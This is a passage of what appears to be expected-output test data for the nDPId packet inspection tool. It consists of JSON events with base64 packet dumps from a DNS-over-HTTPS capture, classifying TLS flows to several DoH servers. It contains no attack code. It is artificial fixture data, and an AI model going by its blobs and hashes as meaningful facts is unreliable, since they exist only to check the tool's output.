9mgPaAr45Z5ZYVR5NUAg5k1dXUDUazzqq9GbzXT1\/7OFi8y8eMdJWfTGFw9qor9xL6ew=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739311703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739311703,"pkt":"REREREREZmZmZmZmCABFAAFIvxBAAL0GjQMKAAABMw980MyiAbu+o\/fohj5JlVAYAfZx1gAAFgMBARsBAAEXAwOEmak1ToTEOPVX0jBh7rLNZM1Gt5\/Gr6ZvrmdHklieHSAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zbmwuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIGzt4\/5xvtyifU6VTcrfvT+YrIEhagkzRKKKlOYdvDd6"} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946739311732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311732,"pkt":"ZmZmZmZmRERERERECABFAAuAX8dAADUGahUzD3zQCgAAAQG7zKKGPkmVvqP5CFAQAIN8DgAAFgMDAHoCAAB2AwNcTBj+nowDUUbglTTLuZi3m0Fgte272n9LPifxOMv7HCAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4BMBAAAuADMAJAAdACCPdFwMNjRtfUXHati0iPvUS7ZISUYNc1KeHBUbO8YTWwArAAIDBBQDAwABARcDAwte+JJAD4P7EW1qK\/KMQB2haaLigWKb\/DYNFwlVC4RO51bq0M8eao6QlrOrDJOFceHVJKhl1p8Ibfrg\/vTRNCJB\/UcW+Fedt+hD1iuUDwTCFZavOS7xwPDkL6497l\/MLuLG4DXgnGeZQ+ANIJd3qmkp82hmnma4vPPfih3FXm2d\/orPnXJKqjQROYWvMcbtvj9Ebb\/txBSHxVMCrKgG408ySWMQj9wSJ3YFhq0yzQL4\/vZaLuRC+Soen8TCR9PMAvnOESL67SWkKNvrhHs7A8wve1+FS4QJZG0DVnfyZjC1lTDakOFEVj8uyQCDIeUSTCCRymHyRKKDInznJ9K1ylbbeIGdenKpQOC\/PvdDSl7uxqaByB3NSIma+imeWtGfSsSVz2bgzfRCO+1shU4LOWr+fJj4VfVm44ziFmXpQXba4f4sLTdWNOjDqe5hsphKeTPq6cjwHY\/8d4YQO1mASNyJu5PHaom1vL8or5mJSUE6nK9PPUFEoI+arXXrdILbrGh6AFzUXQGBrrAdekMh3lpPbuWJTMnyJ+tNhczzi4OaeErbR+eZBtyO483ig0A5ofFGX3QqSY+x\/jYa34H7RpPgi7E73Kv3qvag06VhkcjqWXPokFDtuDpOCx1sHam7i\/mBXaEeSIMn\/6ibfBibK8Ssyhd351G+u7nIG\/kPMrFG9dX2lYQXotCoRmApyZWnnIvnb1Ems9MFs1nWg90WJfHxHinrSdpjBeU8iAbpS\/jrwrYxGk3gVDAv9VGAkZlRz60RiJgOn74olT+JGbdB87Dmd8zXzGHRAs6xX1wLyFHdLBSPxN+wXikNtBamIrek5su\/OhIPfJ9Db8D4NRmo2RQxqPr7fuFEkduV14PFpTKUsiEOkhDJwNg8LiATZ7RVwMg6yMpsydYcgvfMea751TpJNvE95FINDC3Rb\/\/f0HmE4sSUBcBPMBavqAtQ7YhyYupjzYKChAX9lCvR4V0MA3gDeswYrL6CJ2QWYyZ1X5kp+MoOy0A6lbwTY6FAqgtyYhKr1esD7uta6z13oZTeC8zVTDF3SZq3we2RpHyfhsBTKY94xuStpqoHpzXuf67EN9Ci9BXk7ctHV6chPXxbzfNbfHejhQSWblCUVsEWcGJTaWPfYy8Qk91uEWvknUwg3\/gnkTaxOpg74KZR+eQhsLtgXu83uRIpmos4uiAQqNFCr46gFv66IhjUaLn++05xvOtQF+pJff5ceYA3+HVtzS7siCW14iQ0F2g+nmUdK\/l5e2iBJ9jUDVjX1gbsI6q3sWAVlaZSWaqGUPI7tEUJQO+uLheM+t5WJ2hIuHlBrb7V9x7oPe\/w4Jyh22GAaILXTviEQ++5bF7t0H5J22\/uU82cBtUmtPnPK980jnCJpoWHcd5b8NrM+3vBCp31WdecAix\/bw5hrhpdYb3Wuo00LpEwMw5n1XbAIEscw8D\/TDkT3R8DdqFFvsOwEJgVupjA7F1prq8T49hiTkdYl+giz2p0Ayt4KR\/SKb+oWG3y4ZtrykubZr+Qfc18G7yRy1UzXXJ7wFTK5WhTLREjxeCpH6IaQ2zDQ5+I3brP682k2XRTd3nMiVhZaMNZjB3MO3yAICh5zK9ucc+onrCYJIYI\/CtjBj1mJ\/oiWvsTssUIxMNevGNJc8s34PU+GVpiWU7G1gOq2\/oHbQNmNjM6utdbIKFu2BrwDIIIyRNAnfbb8mkTirEZY8JOBVWtUMwNF2wWG\/znmaTdvsV5XVYinNGBvCLJ4cl4jpIhiQHJif7TdKLHCM1mnqE7oXlP0MjNOI8YrXpYFJApJqV+nQMhEAl320hWRRZS9jvtYuADMZM\/zqsrhOwTRUYvn5TUWPPSLkDCWWQT\/boP1Zrm7ipJ29gjQr5TspKmpn4J6SGBQtqSqLcPrjFY1FGqzT0Cxa7I4qGdQmb7BlBoZsZba4XtkUxqQDb7GQ7lF9QZ8stU169sKy3x8YQd1brzqNHrkIJDSvbZZhCJGpijHPtgp\/QG6Dw2\/BImDmY1tBmkVrEm\/bZ+xumAD64t1fYO7WaWjuGbU0Y+9l0+9zDoVeHa476WXFF01qNlSxZZAxFkrGmva65Ha2zNip3N87qP3nyH+3kbjqzMKrpNdw3pOcpWv+PdRxpJZGkBM4aT6LXbJdAxBLLkkepjX3bVMWm9bedod1MvUUZQHAIRVofMSy8iwjG593htNanCQUBVZUhdnlVrmQD4OR5EjaE0aFJSUsVHU2VO9DX1cb2EnPoiZIzX378PPrzLoeda6yE90ZvWYSJeMUQJgjFljjq1Vmv7zPz+m4Us7Q\/oFgLEuTkw4eq\/OB+aA8STNn4AHoTw1B57\/koj\/Tsd4yxadruMqmxj8G0neUx2FN2AmiTBa4RjoLGNzELD8QTXTHG2\/lxfzCVwHvLq9JxQf3uprD59F8Loph7ycBJ+j\/BoYH+iVGt+6GzZ563iyu9UeY0+AiljVO0GFvxbuhFk79OBcmYfgnlTvugErVv1eoGzzwF3KK3N67S4ysk\/cJIT\/DoRZvga\/lMRKstxDLEaDolPIBoEiu4mAsdPBxa5KjB\/uaPK\/Gvldfb7QWo\/hvHLZAM3qCGVxLZ4OSPZzTuJ4fJWIQaOXTrFJVv4TYo67KpO9uvbnZUtP8hCVop9O2qXs\/NKl69+XIEhMfw1KYOxJAcgDxH4xjWm9TWAA+DhZvFs31qLGWSu3CzrM+geUCeE\/Vlrc8pmCZFikrptNtJl0uwOfLeuZUF7VWjDr6R5HxdwbmReRnk8DeQUb8\/JzwIyCR78O7TDjY2uL4IEBoTWwTpLR+tDFV4fNsyzL4VzpHaIwnMWTyomGHXhNDLAvBXN5lZAH1nY9D82KvJ+P8HK2FgOErfXrK6gPfonD48R1bCJofrjuMQkEZVQBGqn5ypZTPRu6EwnkBn4q0ARPtqm0QEoQ1VuhulmyIu4zwbE+pgZlGBWhO+4WIy2SuF0h7yFf\/0cbwCehkDSsGDVM9QRwmW02sBUez1\/0Ml7N8nkc2bCsJgo\/fEUXj1TOn7cIchmlzf+MvAjyYfcGhECzHaENxMQIFKZWAib9UAuoVCbRMTYEaO8+NZKwO6bZTHvUzm+gaaUre7sgcCCP\/wfz0OXBRWwpNRR4m\/LwYXSYWMMhKP7tqCCj6OXjzq62VPsWFinT4KE+SZYXF5y6EZay9KdRh4kW7ybiZ7hqI6uqO0\/mKAHQ\/xlXAuQ2EOnYG47KeZUkoht4zFh4Q7AcG7Q0FtDwRhJqM+GVySAg9IbIymkvgNTTZyOY3isJHVYzmKvFAgPib7ERkwsvRQ\/S8lGEoG+lZogb0KK4PyuRpdocXBa4Io1guVhX2K44\/qHOYqiQPL\/Vb5wtdOiDpag22zTziquJAPx3Cc98vOxAd33lx77fZMHNMz95phNb\/gH\/oBI60jIQ5icFLLZs+m7nP7\/6KXDZlQEY8H6HyN8CbMnqheODed7gRjDQsbXi9MHr27blhbJLCz\/qn8J0uletyL+6GpmTu9W1AZiLdNt26PN\/1uozWEq9dfJLpT7KZnW6S0qvTBGlR4kX8O3fku9pK2qyz9s7t7Ockp7sMMWorJbLnKYK0PgDcQi4HUA+VDHi2RlLA\/XZ9u3fGBeP6zmmrFeEhRc6glZV1JpHMW35YHtgDMlMPiXVu6VYVSboWqwuvKzMobkKuX8tZFxZtF8Qlpv25zGgKwz"} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946739311734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739311734,"pkt":"ZmZmZmZmRERERERECABFAAC4X8lAADUGdNszD3zQCgAAAQG7zKKGPlTtvqP5CFAYAIMEyQAAeS0tOv0CsE56CKvTlOFyTsi\/xDWjEiSHZ06cNkY05jGBZ0BY+\/8ar9VauCfvuAhmfbkHRsufSt9+BCdWOZTLG2pLv7Rqy1KMbXDj1dE3FFg5TtH6GqR+kavc+JEGFEgehaZ\/FbuVi\/sk8mhzGqOKXx4crPRKN7mN3k61duL6EtdmqASfaRcWFkjwmH\/5s907"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739312203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739312203,"pkt":"REREREREZmZmZmZmCABFAAFEaI9AAL0GaqQKAAABdMuz+KL4AbtonCHmRxNJVFAYAfbqtgAAFgMBARcBAAETAwNLJ0LoKZs0jG4db6SH737y8naHXDM3S+mAdGRoYzSPaSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOcnVtcGVsc2VwcC5vcmcABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg33Waic8Yfh0yJ5buIXWM7xt29S4VxDeDA2qvuzRytkE="} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946739312226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6JAADYGLgJ0y7P4CgAAAQG7ovhHE0lUaJwjAlAQAfWSIAAAFgMDAHoCAAB2AwPlxRfYXMEhZdQ8ajfb6CRVs1xCMiaZqVFxrCKnBSpfMSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFxMBAAAuACsAAgMEADMAJAAdACC7U5tcN1lyGmU4zwJoCO50vCXYPM\/QvTMxioFdnZMwahQDAwABARcDAwAgWYRxXowUwkrzaVinqnzWcQ+TBbMUOwCXts50ql211fAXAwMLXdNQugGPXsJ\/8C6qtHlVybUGs7I40LMTA5OhGA+5YDHeNrEuEhv+tu5lin4eHBImQq4kbeHEAo3aNZo3KmURuDQDW8qwTnUEVfBOev0Cp\/PjSdjbD78ol0y5nY2oRm2fbsKHJzJSSjb0AciAo1LrQOgCF2CvMV+eyOyHUYct\/0CZzYMkLxKZwgRjyAJuXMfA4yEKZGM2df01\/BUbSo1Rl+1vGFFUkgKmIgKkRy+Bl\/5\/aUS0H7x+NZdUl10aLbTaEzyxHvC5FKjKyKio8Nq1FnOONx6t6a1NxwFwus79kTDzOhi2RBBAptjB5bREXvI7I78ofmPnYWckOqrJFFwvKuiJMXscIR8meUqP2LfgWzMDMhsH4p0jN+l3Gq+FBdoxKNoG26O484i0pfOfynG5VCfFmeEmq9XB2jrTV2FwEB1w6FHC1GMZVEK60qV4O+pPgrZRJMZSzwllOfjef8V42EZAcff6ioa4KXyU2Lg36HO0yhYzbeNUU3pAi5\/qwo\/8uuPNfVbKx0eipCjwx5+0hZa74DG\/pD0GzntSqS7YWEdlhEup1mtZmQo0eaDjwGNrCt+ZhJgQy3V2hPBCa6ygW9VMF25ycsILPfVx1AuqPxUOHW4j094S0MBQegEN0J3yWeWaiiBlzmaP9zyQI2IatrzAzhNsYChDHK+csfeO9ThoioAfgwS3AljMljsUX8LckrIXpurphG9MTttyGcbyuYOZgMBCh0hvfGempBEWQ87aRGnYict7DJMJ4ANT6I8mIRYfs9ktyEUtlVvr4PQNKARgob1jc7dcCzVhF1wheYyQGYeS88ndMehrocaatcfPAW+sGsd\/PlwCwZjCKZRZc+RY8UIBMVVQFkJfKmd3vMc6ZdNW+eECwipaKd\/GGSBQQLLSZMZlc2\/fq5kgX+ANS93WhwsRG1d13Nrw0y\/ATREqmOdYnxg9NReWvH6Y9oKaWK0ORmDf6ge12lS9oVHWz42D+xzkGejOSsWciqHXAH+yg6krTEDYRK\/FPbGud1EfOntNRDB8fuTqg6A3gnOVkf5Fe+6Udnrmytaz7VKwjYRLdi7vz2qagJMVcAAVeEuovh5FOb\/1EXijxsxUB7j\/jcKgZC3AwFJv0DQSdWi57X+9030WJdNzGWfONsJDey166z5gtgIr0gWE3XSAHs3+JszFzgP3FC9xVilACKjY2RhRQyvT6fGwve0GSnMhLdXxdeZ6r4BSk1XrmYwxLzeXAWqaNfsfk0zirnPcN6UG26k3lnJ6hvodPS8WtfbDlmo8y38gK+0yMKaENYnpsWQ48t8ZDpKCeCokx5kJ4EaYicnC8gtp5emEtPLOmyhRS\/Kx67Xu26y0PrFyj7Ld8XnP+XpwQqAHuqyPPLcA7ULfoMWkppyHnn9L21Mz+6Ml1h7gnl\/ZwxToT4wqDJUExA47\/9+7Gr\/oh5kj8z6qG0LWqBHYWfEqQZ9C6c64n2xAiBIjVtW2HmMJDocq5nLsWLSEY96ngephvH\/r2i4gA320QycCOlUbe7IShXjhfHajvNFk9aT9mVr+xKfGAIJr4upUShXmjRDRgxjZ9A2ryxbqx35tiU7DJrZpjO\/5DMzEBxvVggb2jlqmTLhZH4TtJi6zfeCLrUu+11tfn0GJzj4HRmOyvzdz8MwTSgWBVisogZKhAqzzkq5ai5YnEcmNOW52YkN74XGWlccUSq2JFZXF"} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946739312226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6NAADYGLgF0y7P4CgAAAQG7ovhHE08AaJwjAlAYAfWhygAAp6lKTcn83BQxpQ2W+POQkJxpRZXfacCT49dCzRTmvnt7\/eMDX1qsnmxcn8IW\/\/jaiVs0n6JrCEPqM3KpB310Ezncm8MGw7ZSfjBA5NhRsYZd6g\/lnjS76Li5236Ye\/OssNOz\/mjZ3Pxtb9lckb\/iUUI\/CTV\/O+8693wmOcz\/ttlVvcsf2F2cDnHv69Z9ZcBThvWSK1Fyp8msppNqA2rjumUxHY0NG8Y6Cz7YUFXsrxgVnCyIlXLFSqfPySagEMAo+BwG8r0qoeYlZ+taxtjBF+CPFNBs5wvSzuudNsLZAlsoLeVbC7V4nVAvK0ZozwjUaQXydZ7If0bf1gWwEwbOWvwXqAGoH05iR0Faj+nrSPK0l15jvP1ksCKE\/mIp4VHggNWOkJSAoQLhJ7eDNcolNe3VlYAesuTAoWHjzA4h2mXXEBGcexNswvAECexp5rG8zj4HDx39qgDVWk3o0eoSeBD1Uedt57E3iKOheQuYjuGPkNLW\/CT1EKc1xsQFJaPuXeJntSsuTJIbn\/JmjGMrhs2EpgTuc4i6KbgNr+Dg8naPJNChEcAoURckVZ0QP1tlwwQ3au79pUNst+WdCcPkSU8h2p+dgHNltfLpGpzxtjAkiMDwJHlE7uKJfM3Jooj+j8pbChIDWDckUBPBe4tCMPlI9VbP7p8jHCN+Jbgx\/vlzb\/jhrZ3VmwNp1ed4spIYgJkRtqvwQ8Z+wh5eYA\/rsAfAyJTWCHM70B9AefRgCTo9QDWJRLYx1cy2\/Boia47DDoYb3uBS7QfII4eh4Kp0F4K7dkOLwQWThipleT\/tvJB91q4YO69guoqAikyr2u0R4I\/dsfO61jRS\/0OGcoHRfzyYT6Gw0389lH9EFy84qx0Src85OaD1tRwt6pfR9awywt5CBZe04hE0tSwRbw55PNLODVlESQS0e66OA\/M16o1ABO7aMZrc1JmwD6a7e6weEeFmAazedN8hZmlYv1tms5VSBekoNgGF0CPdRNH7+BWQQ\/oy6wbYcn9T8DbY3EESV3ngHV5p7hWwxUALrbhEOn\/rgSRIuWBulfZWiwjpGLHCmd25Lp9PvWu2ARh3jmQWx3LqaLBWQZ2RO9BztLQCxX\/fKF1FJ2Nxx5CvAx1deQyJI3ILd0FX\/RREt+JafDB83Cz6gQe6DiXexfTUxaiReu6RStMeEaz6P71JkxtuCl0MQOV+trcnTBAsrOiC0Pnp41ddFZ9LyjPw5Mwgkq5S8GDPbsUHU26OG2nr4C2Qc8pral7heokrRYgBHlPnskyAlkCxuL+0XPLYLPIRRcJ64nRekoDw2yg6gDPsz4RcMVRLhEiIfkrCTlBJmmDuRqLpZJpecdlBmRfFHNMXGB8i+H\/\/tNPFLdJAZryXO\/8h5nkH4Mq7yLQ6vkIR62sgbVPD0Qe836LfCEQO\/hxA9iWtbqSJ07ScNvoG2Czrtvhfwq400gs5KtFeBbk1AFnMyczsxPdl6tp142MbR3VLQmj78nlxilK51hORcVLi9ktXxGEonuDfod4vDjaA3pJ\/0ADkZjstpvA2GHymd+GbXXXQzsOxrlPNaHDKM7gA5XeYsGBeDXesqay1VJZXsBwjzKmLHBEfMmuTQkRGywy3RBFrIumMzi24aTghRx9FA\/ZPDZtgNyArr3TSzkQB\/WYB0FDxqBDH7pfBnH8cJXOSx4GfComMuGBhw8lB8S7RS+Tun6aoozaQ7NOXFkWLUNwlMATJg\/u88xBUir9H293nJp613ia6G8KaLtsNZhb97810Q6p5rpfzJ8sEbxPvnOBsJoN2uNaptS39DLNaJ78nP1N\/6JenLJUIebOzoNXR4wfNgVp5Coyyjw8dfCFDyuNA5Oi18AcVmGaGj7TK82vR9gQ2IWuTm0sTMl0T1RNelk87ZLC7oqgqi01091WCo6H3\/T5HgzDHHgrz3hvSk8s9"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739317842,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739317842,"pkt":"REREREREZmZmZmZmCABFAAFDy\/NAAL0GDsoKAAABwx5eHOp6AbvJsoUZMUH8QlAYAfbjLAAAFgMBARYBAAESAwOCYT7eCU1xUXbhTPV2JlKPIHcY7sPH2WwKtpwnSeF8xyAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmZmbXVjLm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAw+TAbBBMqcOYtJZmoA1qcBE16Yt0ym3XOBLcMkrVpDQ=="} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04399{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739317868,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739317868,"pkt":"ZmZmZmZmRERERERECABFAAuAyWFAADgGjB\/DHl4cCgAAAQG76noxQfxCybKGNFAQAfXtaQAAFgMDAHoCAAB2AwNkyl8ogzMlAhTUQA2TsMh7Q0Cc2\/3wZHCiwad1Z9NoaCAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9BMCAAAuACsAAgMEADMAJAAdACD+8H0HbVGEEmZC5hZLdNizcuC\/0pRP3fgeIP4D\/GwhdRQDAwABARcDAwAkfwnuX6wEOZOBUTjar1eVwNX\/5E0Ocx7Di9qIEnerial2sCiHFwMDDDWV4W2nvLW+\/N2l4x6sJgc8wiYdu5HOhM21Gm3mnFcxKO2Ie6ZC8TBNY2Mpp7Yb5r